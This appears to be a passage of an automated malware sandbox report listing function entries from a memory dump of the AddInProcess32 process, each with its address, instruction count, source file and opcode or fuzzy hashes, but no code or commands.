                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9D02B329850346ACB37F119BC08F93BBED9B44220F014CA4F30896215D554DD8596C4
                                                                                                                                                                                                                                        Function 017B823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                        • Instruction ID: 229a3587d967f007f1a6ca9a8917190c37f2655351d96ac445a70b604f0a0845
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4BE08631004915DED7322F1ADC54BD1B6AAFF54B10F144859E145450A487B45881CA46
                                                                                                                                                                                                                                        Function 017C2050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: edb6613e070946cf4645557f5d199fcd7de61c3238d47e03927e47f4ef9e0183
                                                                                                                                                                                                                                        • Instruction ID: 23265b553f6e47c3b3e60c3ea5a172719008d6d254e4ecbf00d948797eb14571
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: edb6613e070946cf4645557f5d199fcd7de61c3238d47e03927e47f4ef9e0183
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FE0C2331005646BC311FB5DDD50F8AB3AEEFA5760F100129F155976D8CB20ED00C794
                                                                                                                                                                                                                                        Function 017F8A90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                                                                        • Instruction ID: fbe8e40e3bc9aa9bbde735f74e588ec8ba2cc576098acb98fa9ba425a6a2e48d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B5E08633111A1487C728DF18D511B73B7A4EF45720F09463EA61347780C534E548C795
                                                                                                                                                                                                                                        Function 01816AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                        • Instruction ID: bc40f9f4b786d8508f70c10f04dd29d3de7ddd9b18e313d94d3361bf0f1e3927
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CFD05E37511A50AFC3329F1BEA04C13FBF9FBC4B107050A2EA54583924C670A806CBA0
                                                                                                                                                                                                                                        Function 017FE59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                        • Instruction ID: 91c9873eb2ae688d012e77a6e1cecada7f72a6523543adc4c13455ebf003f080
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19D0A932604A20ABD732AA1CFC04FC373E8BB88720F0A0859F028C7090C3A0AC81CA84
                                                                                                                                                                                                                                        Function 0183E908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                        • Instruction ID: 9edadc4e9689f67097243e7219128ec92bcc9d009f7c4da5438db0f24a5b2c80
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DE0EC759506889BDF12DF59C644F5AFBF9BB94B40F190458A5089B664C624A900CB80
                                                                                                                                                                                                                                        Function 017BA0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                        • Instruction ID: 34debfa4ade60548f858f57e21b2a52eb451b0d5bdffb8f0b98bfb6d4126d10f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2D0223221207193CB2867556984FA3E925EB80A90F1A006D340A93800C2058C42C2E0
                                                                                                                                                                                                                                        Function 017FA830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                        • Instruction ID: 59d6f2cea591c89d420c1f5326e860a9a19ed603feed9c5892b6450ed49cc4bf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2D022370D010CBBCB119F62CC01F907BA8E760BA0F004020B508870A0C63AE850C580
                                                                                                                                                                                                                                        Function 017FCA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a36c411f29f681bfd0d02a5eefc20ac58985fb04cf67bab1601749d81f1842a8
                                                                                                                                                                                                                                        • Instruction ID: 9c61ae50b91bf0a59d97d32d0739a25d226da0fe9a4994b1ac4eb2e8dd28c1c6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a36c411f29f681bfd0d02a5eefc20ac58985fb04cf67bab1601749d81f1842a8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BDD0A730901106CBDF17CF08C650D2FB770FF50740B44046CF70091521E325EE01DA40
                                                                                                                                                                                                                                        Function 017D02A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                        • Instruction ID: 8d387af0462eb61bfb063e4c23cc860b466deb636c861b7f6da6f9f1ff830e18
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96D0C935617E84CFD61BCF0CC5A4B1573B4BB84B44F8104A0F401CBB22D63CEA80CA00
                                                                                                                                                                                                                                        Function 017FC700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                        • Instruction ID: 4f7b97e53473dafcca2282a773459a4922244912d0b37c5b81aba878309aadb6
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEC01232150648AFC7119B95CD01F0177A9E798B40F000421F20447570C531E810D644
                                                                                                                                                                                                                                        Function 017E0310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                        • Instruction ID: 4ac601f497e4ee228c2d1893fb51464ccd0ba767f88acc595fe64be1daf1e63b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDD01236200248EFCB01DF41C894D9AB76AFBD8710F108019FD19076118A75ED62DA50
                                                                                                                                                                                                                                        Function 017C0750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                        • Instruction ID: 23efade9b4f906f0ee60a49fe0e214294d9fe34daa1de6f91f90452824e959be
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60C048BA711A468FCF16DB2ED698F49B7F8FB44740F150890E809CBB26E624E941CA11
                                                                                                                                                                                                                                        Function 01894DAD Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                                                                                                        • Instruction ID: c1775b7f1c60a2d9158e629409190e72ca0c8cde9ba72ebb48cc45197b5415d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DB01232216545CFC7026720CB08B1872EDBF057C0F0A00F065008D831D6188910E501
                                                                                                                                                                                                                                        Function 01804340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 0767cc8407327ca22394190488a0799d9262cd124f99bac56417c2350f221a3c
                                                                                                                                                                                                                                        • Instruction ID: cbfe23e26dde99cb9f13f4d872952e50f12319808008f4004051cae0dd9d8bc8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0767cc8407327ca22394190488a0799d9262cd124f99bac56417c2350f221a3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09900233645800179140715848855465009A7E2301B55C011E1428554CCB148B5A5362
                                                                                                                                                                                                                                        Function 01804650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 53e2fd810ff5a4485f710178bd4935e04d3a84e6f491d835e481da3aaefa9109
                                                                                                                                                                                                                                        • Instruction ID: 09e01f498cbfaf6453d4f295919aa14610e06ab336ac92c85e2b913ec90b9f66
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53e2fd810ff5a4485f710178bd4935e04d3a84e6f491d835e481da3aaefa9109
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A900263641500474140715848054067009A7E3301395C115A1558560CC7188A59936A
                                                                                                                                                                                                                                        Function 01802B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 5c5c8dc82ac063d09844493c75156c0f0abd3f5e0c479737a12074398d5a5381
                                                                                                                                                                                                                                        • Instruction ID: b5c126fb2de15391a50a859bcb06f6223de92fb5f4791cb87582439f59cb00d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c5c8dc82ac063d09844493c75156c0f0abd3f5e0c479737a12074398d5a5381
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D90023324140807D10471584805686100997D2301F55C011A7028655ED7658A957232
                                                                                                                                                                                                                                        Function 01802BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c8372d196aace8c61a3bb6f023ce3c751ecf0c0e7699e9a44526b1d301f2668a
                                                                                                                                                                                                                                        • Instruction ID: 5e575a301b391ba756e6bac4d4891b4a694d45169cb98aa400d516d354517901
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8372d196aace8c61a3bb6f023ce3c751ecf0c0e7699e9a44526b1d301f2668a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F90023364540807D15071584415746100997D2301F55C011A1028654DC7558B5977A2
                                                                                                                                                                                                                                        Function 01802BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1ab9553cc2e9482bf49f6fc4ba9356b92d0a38b0c90fa0772c14b8ef871c020b
                                                                                                                                                                                                                                        • Instruction ID: 987114977410994bcf56ce9d9446ff96b08ed266cd6f25e0fafac681eacbf600
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ab9553cc2e9482bf49f6fc4ba9356b92d0a38b0c90fa0772c14b8ef871c020b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3190023324544847D14071584405A46101997D2305F55C011A1068694DD7258F59B762
                                                                                                                                                                                                                                        Function 01802AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f8f0c6b744ff24fcddbcd28bd6908a7e74b891633d7c9116d47c75bd47c00520
                                                                                                                                                                                                                                        • Instruction ID: 26b01c496a754f26c53a049c7ade2761d6cc43ed87e2b4956339c3e65223abd1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8f0c6b744ff24fcddbcd28bd6908a7e74b891633d7c9116d47c75bd47c00520
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 879002A3241540974500B2588405B0A550997E2301B55C016E2058560CC6258A559236
                                                                                                                                                                                                                                        Function 01802AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a9f3b4d4ad5c2186d078491f909ece146e7f489ecbcc68539c98146af3c77b48
                                                                                                                                                                                                                                        • Instruction ID: 7f54e1e5405f1f6b49581c67bda364e83cb83bf4d944a2244d25a5e606a50d83
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9f3b4d4ad5c2186d078491f909ece146e7f489ecbcc68539c98146af3c77b48
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62900227261400070145B558060550B1449A7D7351395C015F241A590CC7218A695322
                                                                                                                                                                                                                                        Function 01802DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 8f3aef9c1305aedba56092637a3a08843f085c8ad8baec7609302315056ca809
                                                                                                                                                                                                                                        • Instruction ID: fa4cc8f6e5b1f307dc59038436b8484a0af4f671b8948d5bd51da6db7638b77c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f3aef9c1305aedba56092637a3a08843f085c8ad8baec7609302315056ca809
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E190023328140407D14171584405606100DA7D2341F95C012A1428554EC7558B5AAB62
                                                                                                                                                                                                                                        Function 01802D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f05f56acebd82c7bbb2c0d233fb9da060a76c96395f3a323d6d84c909f2f98ac
                                                                                                                                                                                                                                        • Instruction ID: 83da91625bcf4e3a040bda8114f963cc0ae90eb990ec93fa2b6d48fbc377d71b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f05f56acebd82c7bbb2c0d233fb9da060a76c96395f3a323d6d84c909f2f98ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0590022324544447D10075585409A06100997D2305F55D011A2068595DC7358A55A232
                                                                                                                                                                                                                                        Function 01802CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1dd7d76fd7a86296e2aecf0f6653f2ced70dfd896e015053535766115077e401
                                                                                                                                                                                                                                        • Instruction ID: a67463cdf98d8153ff9436a681755d6093ed1befe61cb9be18035e7048a47c51
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dd7d76fd7a86296e2aecf0f6653f2ced70dfd896e015053535766115077e401
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9290022364540407D14071585419706101997D2301F55D011A1028554DC7598B5967A2
                                                                                                                                                                                                                                        Function 01802CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
